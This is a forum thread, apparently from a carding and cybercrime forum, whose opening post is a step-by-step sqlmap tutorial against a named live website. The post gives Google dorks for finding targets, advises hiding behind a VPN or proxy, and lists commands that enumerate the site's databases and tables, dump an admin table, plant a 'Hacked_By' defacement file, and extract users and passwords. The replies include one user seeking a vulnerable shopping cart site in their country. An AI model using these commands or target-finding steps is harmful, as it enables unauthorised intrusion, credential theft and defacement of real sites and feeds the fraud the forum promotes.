If you have any questions, contact us:
Telegram:maintex
ICQ:1607000

  #1 Old 01-13-2016, 09:14 AM
Helper
VERIFIED
 
Helper's Avatar
 
Join Date: Jun 2014
Posts: 166
Contact: 555-278-026
Helper is on a distinguished road
Send a message via ICQ to Helper
Default Sqlmap Tutorial

Hello All Members!

Injection Tool: sqlmap

Official Page: http://sqlmap.org

Download Link: https://github.com/sqlmapproject/sqlmap/zipball/master

Testing: WIndows XP/SP3 , Python 2.7.5

vulnerability Page: http://www.godwins-law.co.uk/staff.php?id=10'

!!!!! Use OpenVPN OR PROXY !!!!!

Step1. Target

Google Dork: inurl:index.php , inurl:staff.php , inurl:show.php , inurl:login.php , etc...

Target: http://www.godwins-law.co.uk/staff.php?id=10

Target WebServer Operating System: WIndows 2003

Target WebApplication: ASP.NET , Microsoft IIS 6.0 , PHP 5.2.8

Target BackEndDataBase: MySQL 5.0.0

Step2. DataBase

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --dbs

--database--

godwins
information_schema

Step3. Table

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins --tables

--table--

adminhelp
articlecats
articles
contentimages
imagelib
news
pages
staff

Step4. Column & Dump

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins -T adminhelp --columns

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql -D godwins -T adminhelp --dump

Step5. Hacked Text

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --file-dest=Hacked_By_sasami_327.txt

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --file-read=Hacked_By_sasami_327.txt

Step6. user & password

sqlmap.py -u "www.godwins-law.co.uk/staff.php?id=10" --dbms=mysql --users --passwords
__________________
Helper is offline   Reply With Quote
  #2 Old 04-07-2016, 08:07 PM
rikketik
 
rikketik's Avatar
 
Join Date: Apr 2016
Posts: 9
rikketik is an unknown quantity at this point
Default

nice tut
rikketik is offline   Reply With Quote
  #3 Old 02-21-2017, 05:30 AM
dahu
 
dahu's Avatar
 
Join Date: Feb 2017
Posts: 4
dahu is an unknown quantity at this point
Default

nice tut thanks
dahu is offline   Reply With Quote
  #4 Old 05-26-2017, 06:11 AM
Magrelohspfc
 
Magrelohspfc's Avatar
 
Join Date: May 2017
Posts: 5
Magrelohspfc is an unknown quantity at this point
Default

Thanks
Magrelohspfc is offline   Reply With Quote
  #5 Old 05-26-2017, 07:27 AM
komerhanda
 
komerhanda's Avatar
 
Join Date: May 2017
Posts: 3
Contact: 718566205
komerhanda is an unknown quantity at this point
Default

all i need is vulnerable shopping cart site in my country now.
Thanks
komerhanda is offline   Reply With Quote
  #6 Old 05-26-2017, 06:54 PM
xnx7704
 
xnx7704's Avatar
 
Join Date: May 2017
Posts: 9
xnx7704 is an unknown quantity at this point
Default

thanks!!
xnx7704 is offline   Reply With Quote
  #7 Old 01-20-2022, 07:21 PM
feiman
 
feiman's Avatar
 
Join Date: Aug 2013
Posts: 56
feiman is on a distinguished road
Default

where is adminhelp table?
feiman is offline   Reply With Quote
Reply

Tags
sqlmap, tutorial

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


Cybercrime forum, cybercrime site, ,fraud forum, russian fraud forum, Credit cards, carder, infraud, carders.ws, crdpro, fraudsters, darkpro, crdcrew, dumps, cvv, cc, stuff carding, legit seller, vendor, free cvv, dumps+pin, skimmer, ,shimmer, emv software, emv chip writer, free cc+cvv, valid cards, track 2, free cvv, dump pin, dumps, cvv, cc, credit cards, real carding, legit vendor, carder forum, carding tutorial, russian hackers, online cvv shop, track 101, enroll, fullz